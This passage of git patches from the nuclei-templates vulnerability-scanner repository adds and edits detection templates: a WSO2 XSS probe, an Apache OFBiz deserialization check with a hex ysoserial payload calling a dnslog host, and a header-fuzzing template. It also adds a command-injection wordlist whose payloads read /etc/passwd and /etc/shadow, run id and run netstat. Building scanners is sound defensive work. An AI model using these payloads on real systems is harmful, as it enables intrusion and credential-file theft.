${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null) + Connection: close + User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) + Accept: */* + Content-Length: 56 + Content-Type: application/x-www-form-urlencoded + + wp-submit=Get+New+Password&redirect_to=&user_login={{username}} + + unsafe: true + extractors: + - type: regex + name: username + internal: true + group: 1 + part: body + regex: + - 'Author:(?:[A-Za-z0-9 -\_="]+)? Date: Wed, 24 Mar 2021 11:53:22 +0000 Subject: [PATCH 34/64] Auto Update README [Wed Mar 24 11:53:22 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 772d9d54d5..26f449abad 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 254 | vulnerabilities | 116 | exposed-panels | 108 | +| cves | 254 | vulnerabilities | 117 | exposed-panels | 108 | | takeovers | 65 | exposures | 64 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | | fuzzing | 6 | helpers | 4 | iot | 7 | -**79 directories, 832 files**. +**79 directories, 833 files**. From 1d09746f085440483063b006c8ba1b7a7d496d45 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 24 Mar 2021 19:18:42 +0530 Subject: [PATCH 35/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 8cf8fc5e37..a373de8112 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -55,7 +55,7 @@ requests: part: header - type: word words: - - "null (Illegal hexadecimal character at index 0)" + - "null" - "errorMessage" part: body condition: and From b7adc5e2fd220451be4871cad9562dd335865283 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 24 Mar 2021 19:20:57 +0530 Subject: [PATCH 36/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index a373de8112..2a97397022 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -55,7 +55,7 @@ requests: part: header - type: word words: - - "null" + - "deserializing" - "errorMessage" part: body condition: and From 92cda223eba88cfe611187ee603e4d9505353e82 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 24 Mar 2021 21:05:32 +0530 Subject: [PATCH 37/64] Create CVE-2020-17453.yaml --- cves/2020/CVE-2020-17453.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2020/CVE-2020-17453.yaml diff --git a/cves/2020/CVE-2020-17453.yaml b/cves/2020/CVE-2020-17453.yaml new file mode 100644 index 0000000000..e6409d3a14 --- /dev/null +++ b/cves/2020/CVE-2020-17453.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-17453 + +info: + name: WSO2 Carbon Management Console - XSS + author: madrobot + severity: medium + description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests. + tags: xss,wso2,cve2020 + # https://www.shodan.io/search?query=Server%3A+WSO2+Carbon+Server + +requests: + - method: GET + path: + - '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "'';alert('nuclei')//';" + part: body + + - type: word + words: + - "text/html" + part: header From 423be58952687bfc08275424aa5a2bee85f6204b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 22:42:56 +0530 Subject: [PATCH 38/64] Update CVE-2020-17453.yaml --- cves/2020/CVE-2020-17453.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-17453.yaml b/cves/2020/CVE-2020-17453.yaml index e6409d3a14..17c80dd210 100644 --- a/cves/2020/CVE-2020-17453.yaml +++ b/cves/2020/CVE-2020-17453.yaml @@ -5,13 +5,14 @@ info: author: madrobot severity: medium description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests. - tags: xss,wso2,cve2020 - # https://www.shodan.io/search?query=Server%3A+WSO2+Carbon+Server + tags: xss,wso2,cve2020,cve + reference: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132 requests: - method: GET path: - '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F' + matchers-condition: and matchers: - type: status From 8b4c8b8549e76c47655c83935f213cf97ba389a7 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 22:46:39 +0530 Subject: [PATCH 39/64] wrong branch :sweat_smile: --- cves/2021/CVE-2021-26295.yaml | 61 ----------------------------------- 1 file changed, 61 deletions(-) delete mode 100644 cves/2021/CVE-2021-26295.yaml diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml deleted file mode 100644 index 8cf8fc5e37..0000000000 --- a/cves/2021/CVE-2021-26295.yaml +++ /dev/null @@ -1,61 +0,0 @@ -id: CVE-2021-26295 -info: - name: Apache OFBiz RMI deserializes Arbitrary Code Execution - author: madrobot - severity: critical - tags: apache,cve,cve2021,rce,ofbiz - description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295 - - # Note:- This is detection template, To perform deserializes do as below - # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot - # `cat mad.ot | hex` and replace in along with the url in std-String value - # Exploit: https://github.com/yumusb/CVE-2021-26295-POC - -requests: - - raw: - - | - POST /webtools/control/SOAPService HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 - Connection: close - Content-Type: application/xml - Content-Length: 910 - - - - - - - - - bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a - - - - - - - - - - - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "OFBiz.Visitor=" - part: header - - type: word - words: - - "null (Illegal hexadecimal character at index 0)" - - "errorMessage" - part: body - condition: and From 1a4743912348e75d56d13682b7b35b7c6986fc29 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Mar 2021 17:17:30 +0000 Subject: [PATCH 40/64] Auto Update README [Wed Mar 24 17:17:30 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 26f449abad..050220ac6f 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 254 | vulnerabilities | 117 | exposed-panels | 108 | +| cves | 255 | vulnerabilities | 117 | exposed-panels | 108 | | takeovers | 65 | exposures | 64 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | | fuzzing | 6 | helpers | 4 | iot | 7 | -**79 directories, 833 files**. +**79 directories, 834 files**. From 3876cb6b55886df5248d4e64c54d3fa73c6c604b Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:30:15 +0530 Subject: [PATCH 41/64] Create CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 59 +++++++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 cves/2021/CVE-2021-26295.yaml diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml new file mode 100644 index 0000000000..5ab6b8a4ea --- /dev/null +++ b/cves/2021/CVE-2021-26295.yaml @@ -0,0 +1,59 @@ +id: CVE-2021-26295 +info: + name:Apache OFBiz RMI deserializes Arbitrary Code Execution + author: madrobot + severity: critical + tags: apache,cve,cve2021,rce + description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295 + + # Note:- This is detection template To perform deserializes + # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot + # hex mad.ot and replace in along with the user in std-String value +requests: + - raw: + - | + POST /webtools/control/SOAPService HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 + Connection: close + Content-Type: application/xml + Content-Length: 910 + + + + + + + + + + bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a + + + + + + + + + + + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "OFBiz.Visitor=" + part: header + - type: word + words: + - "null (Illegal hexadecimal character at index 0)" + - "errorMessage" + part: body From 38daf751a3e0d7725de5bb32141e99f0e1842637 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:32:09 +0530 Subject: [PATCH 42/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 5ab6b8a4ea..3b224d5fa5 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -1,6 +1,6 @@ id: CVE-2021-26295 info: - name:Apache OFBiz RMI deserializes Arbitrary Code Execution + name: Apache OFBiz RMI deserializes Arbitrary Code Execution author: madrobot severity: critical tags: apache,cve,cve2021,rce From c55a72a1681153f51dab7cc35f51ec4110a3815b Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:42:35 +0530 Subject: [PATCH 43/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 3b224d5fa5..06d27c2790 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -7,7 +7,7 @@ info: description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295 - # Note:- This is detection template To perform deserializes + # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # hex mad.ot and replace in along with the user in std-String value requests: From 33e3fac8da3b63c5bd55dd969c7a1784e61dac96 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:42:58 +0530 Subject: [PATCH 44/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 06d27c2790..1e87d42cec 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -30,8 +30,7 @@ requests: - - bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a + bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a From 9987dc0c3633d3a24baedc16f3161cc69c4107bf Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:48:13 +0530 Subject: [PATCH 45/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 1e87d42cec..634b2cfb13 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -9,7 +9,7 @@ info: # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot - # hex mad.ot and replace in along with the user in std-String value + # `cat mad.ot | hex` and replace in along with the url in std-String value requests: - raw: - | From 635cc7fae79ecc30144b8b9102fe254af56f6b8d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 13:00:26 +0530 Subject: [PATCH 46/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 634b2cfb13..aed35553ad 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -3,13 +3,14 @@ info: name: Apache OFBiz RMI deserializes Arbitrary Code Execution author: madrobot severity: critical - tags: apache,cve,cve2021,rce + tags: apache,cve,cve2021,rce,ofbiz description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295 # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # `cat mad.ot | hex` and replace in along with the url in std-String value + requests: - raw: - | @@ -56,3 +57,4 @@ requests: - "null (Illegal hexadecimal character at index 0)" - "errorMessage" part: body + condition: and From 7a8d56ee651a1b94d66350618b8f6ce63162786d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 13:02:29 +0530 Subject: [PATCH 47/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index aed35553ad..8cf8fc5e37 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -10,6 +10,7 @@ info: # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # `cat mad.ot | hex` and replace in along with the url in std-String value + # Exploit: https://github.com/yumusb/CVE-2021-26295-POC requests: - raw: From 8e781f97d0c0b6dc0969f96b48aff6e0ab045f62 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 24 Mar 2021 19:18:42 +0530 Subject: [PATCH 48/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 8cf8fc5e37..a373de8112 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -55,7 +55,7 @@ requests: part: header - type: word words: - - "null (Illegal hexadecimal character at index 0)" + - "null" - "errorMessage" part: body condition: and From bc5ab99237b30262601bb20238d609101b782ace Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 24 Mar 2021 19:20:57 +0530 Subject: [PATCH 49/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index a373de8112..2a97397022 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -55,7 +55,7 @@ requests: part: header - type: word words: - - "null" + - "deserializing" - "errorMessage" part: body condition: and From debee9b3e7e2f9524fb94f46983d7caaeedd2e77 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Mar 2021 17:29:49 +0000 Subject: [PATCH 50/64] Auto Update README [Wed Mar 24 17:29:49 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 050220ac6f..59f45d7176 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 255 | vulnerabilities | 117 | exposed-panels | 108 | +| cves | 256 | vulnerabilities | 117 | exposed-panels | 108 | | takeovers | 65 | exposures | 64 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | | fuzzing | 6 | helpers | 4 | iot | 7 | -**79 directories, 834 files**. +**79 directories, 835 files**. From 68cc8b67cd55e5aa62c4fa2870b1834b3743aecb Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 24 Mar 2021 17:40:08 +0000 Subject: [PATCH 51/64] Create command-injection.txt --- helpers/wordlists/command-injection.txt | 75 +++++++++++++++++++++++++ 1 file changed, 75 insertions(+) create mode 100644 helpers/wordlists/command-injection.txt diff --git a/helpers/wordlists/command-injection.txt b/helpers/wordlists/command-injection.txt new file mode 100644 index 0000000000..9fe9ecd72c --- /dev/null +++ b/helpers/wordlists/command-injection.txt @@ -0,0 +1,75 @@ +<!--#exec%20cmd="/bin/cat%20/etc/passwd"--> +<!--#exec%20cmd="/bin/cat%20/etc/shadow"--> +<!--#exec%20cmd="/usr/bin/id;--> +<!--#exec%20cmd="/usr/bin/id;--> +/index.html|id| +;id; +;id +;netstat -a; +;system('cat%20/etc/passwd') +;id; +|id +|/usr/bin/id +|id| +|/usr/bin/id| +||/usr/bin/id| +|id; +||/usr/bin/id; +;id| +;|/usr/bin/id| +\n/bin/ls -al\n +\n/usr/bin/id\n +\nid\n +\n/usr/bin/id; +\nid; +\n/usr/bin/id| +\nid| +;/usr/bin/id\n +;id\n +|usr/bin/id\n +|nid\n +`id` +`/usr/bin/id` +a);id +a;id +a);id; +a;id; +a);id| +a;id| +a)|id +a|id +a)|id; +a|id +|/bin/ls -al +a);/usr/bin/id +a;/usr/bin/id +a);/usr/bin/id; +a;/usr/bin/id; +a);/usr/bin/id| +a;/usr/bin/id| +a)|/usr/bin/id +a|/usr/bin/id +a)|/usr/bin/id; +a|/usr/bin/id +;system('cat%20/etc/passwd') +;system('id') +;system('/usr/bin/id') +%0Acat%20/etc/passwd +%0A/usr/bin/id +%0Aid +%0A/usr/bin/id%0A +%0Aid%0A +| id +& id +; id +%0a id %0a +`id` +$;/usr/bin/id +$(`cat /etc/passwd`) +cat /etc/passwd +%0Acat%20/etc/passwd +{{ get_user_file("/etc/passwd") }} + + +system('cat /etc/passwd'); + From bef49214f4b0db156acc376ba94862c08e599f04 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 24 Mar 2021 17:44:46 +0000 Subject: [PATCH 52/64] Create request-headers.txt --- helpers/wordlists/request-headers.txt | 33 +++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 helpers/wordlists/request-headers.txt diff --git a/helpers/wordlists/request-headers.txt b/helpers/wordlists/request-headers.txt new file mode 100644 index 0000000000..8cbd62b12b --- /dev/null +++ b/helpers/wordlists/request-headers.txt @@ -0,0 +1,33 @@ +Accept +Accept-Charset +Accept-Datetime +Accept-Encoding +Accept-Language +Authorization +Cache-Control +Connection +Content-Length +Content-MD5 +Content-Type +Cookie +Date +Expect +Forwarded +From +Host +If-Match +If-Modified-Since +If-None-Match +If-Range +If-Unmodified-Since +Max-Forwards +Origin +Pragma +Proxy-Authorization +Range +Referer +TE +Upgrade +User-Agent +Via +Warning From 87b5ebc7f1901a7241e667bfafd4ac7baa4219f3 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 24 Mar 2021 17:46:18 +0000 Subject: [PATCH 53/64] Create header-command-injection.yaml --- .../generic/header-command-injection.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 vulnerabilities/generic/header-command-injection.yaml diff --git a/vulnerabilities/generic/header-command-injection.yaml b/vulnerabilities/generic/header-command-injection.yaml new file mode 100644 index 0000000000..601b46d460 --- /dev/null +++ b/vulnerabilities/generic/header-command-injection.yaml @@ -0,0 +1,37 @@ +id: header-command-injection + +info: + name: Header Command Injection + author: geeknik + severity: high + description: Fuzzings headers for command injection + +requests: + - payloads: + header: nuclei-templates/helpers/payloads/request-headers.txt + payload: nuclei-templates/helpers/payloads/command-injection.txt + + raw: + - | + GET /?§header§ HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 + §header§: §payload§ + Connection: close + + attack: clusterbomb + + redirects: true + + matchers-condition: or + matchers: + - type: word + words: + - "uid=" + - "gid=" + - "groups=" + condition: and + + - type: regex + regex: + - "root:[x*]:0:0:" From da6a52a0530a63eadb34ee039224137cdd0ee72a Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 24 Mar 2021 17:50:20 +0000 Subject: [PATCH 54/64] Update header-command-injection.yaml --- vulnerabilities/generic/header-command-injection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/header-command-injection.yaml b/vulnerabilities/generic/header-command-injection.yaml index 601b46d460..fc600b5ac8 100644 --- a/vulnerabilities/generic/header-command-injection.yaml +++ b/vulnerabilities/generic/header-command-injection.yaml @@ -4,7 +4,7 @@ info: name: Header Command Injection author: geeknik severity: high - description: Fuzzings headers for command injection + description: Fuzzing headers for command injection requests: - payloads: From 3c670a9f17e2f951c6c51480c3aecc38891ae213 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 24 Mar 2021 17:53:32 +0000 Subject: [PATCH 55/64] Update header-command-injection.yaml --- vulnerabilities/generic/header-command-injection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/header-command-injection.yaml b/vulnerabilities/generic/header-command-injection.yaml index fc600b5ac8..8a2c57128a 100644 --- a/vulnerabilities/generic/header-command-injection.yaml +++ b/vulnerabilities/generic/header-command-injection.yaml @@ -22,7 +22,7 @@ requests: attack: clusterbomb redirects: true - + matchers-condition: or matchers: - type: word From d183f2439a586b6c9afe4c035dcc6760d56defcd Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 23:25:19 +0530 Subject: [PATCH 56/64] Update header-command-injection.yaml --- vulnerabilities/generic/header-command-injection.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/generic/header-command-injection.yaml b/vulnerabilities/generic/header-command-injection.yaml index fc600b5ac8..cb5f57b18b 100644 --- a/vulnerabilities/generic/header-command-injection.yaml +++ b/vulnerabilities/generic/header-command-injection.yaml @@ -8,8 +8,8 @@ info: requests: - payloads: - header: nuclei-templates/helpers/payloads/request-headers.txt - payload: nuclei-templates/helpers/payloads/command-injection.txt + header: helpers/payloads/request-headers.txt + payload: helpers/payloads/command-injection.txt raw: - | @@ -22,7 +22,6 @@ requests: attack: clusterbomb redirects: true - matchers-condition: or matchers: - type: word From ea6a8e574dede5d6642f4c6b1d05525bf15fc01f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 23:26:19 +0530 Subject: [PATCH 57/64] move files around --- .../generic => fuzzing}/header-command-injection.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {vulnerabilities/generic => fuzzing}/header-command-injection.yaml (100%) diff --git a/vulnerabilities/generic/header-command-injection.yaml b/fuzzing/header-command-injection.yaml similarity index 100% rename from vulnerabilities/generic/header-command-injection.yaml rename to fuzzing/header-command-injection.yaml From 71d5cdf494c4353fd007f86444e414fd0bf98ee7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Mar 2021 18:09:19 +0000 Subject: [PATCH 58/64] Auto Update README [Wed Mar 24 18:09:19 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 59f45d7176..8299180c41 100644 --- a/README.md +++ b/README.md @@ -41,9 +41,9 @@ An overview of the nuclei template directory including number of templates assoc | takeovers | 65 | exposures | 64 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | -| fuzzing | 6 | helpers | 4 | iot | 7 | +| fuzzing | 7 | helpers | 6 | iot | 7 | -**79 directories, 835 files**. +**79 directories, 838 files**. From 9ef896f6910a2949c4b0952ad62a69fe672c9b62 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 23:42:37 +0530 Subject: [PATCH 59/64] moving to payloads --- helpers/{wordlists => payloads}/command-injection.txt | 0 helpers/{wordlists => payloads}/request-headers.txt | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename helpers/{wordlists => payloads}/command-injection.txt (100%) rename helpers/{wordlists => payloads}/request-headers.txt (100%) diff --git a/helpers/wordlists/command-injection.txt b/helpers/payloads/command-injection.txt similarity index 100% rename from helpers/wordlists/command-injection.txt rename to helpers/payloads/command-injection.txt diff --git a/helpers/wordlists/request-headers.txt b/helpers/payloads/request-headers.txt similarity index 100% rename from helpers/wordlists/request-headers.txt rename to helpers/payloads/request-headers.txt From 904c9666d13785aa25feef32b4e49ad0b03ed5cc Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 25 Mar 2021 01:28:03 +0530 Subject: [PATCH 60/64] matcher and workflow update --- cves/2020/CVE-2020-35489.yaml | 104 +++--------------------------- workflows/wordpress-workflow.yaml | 1 + 2 files changed, 10 insertions(+), 95 deletions(-) diff --git 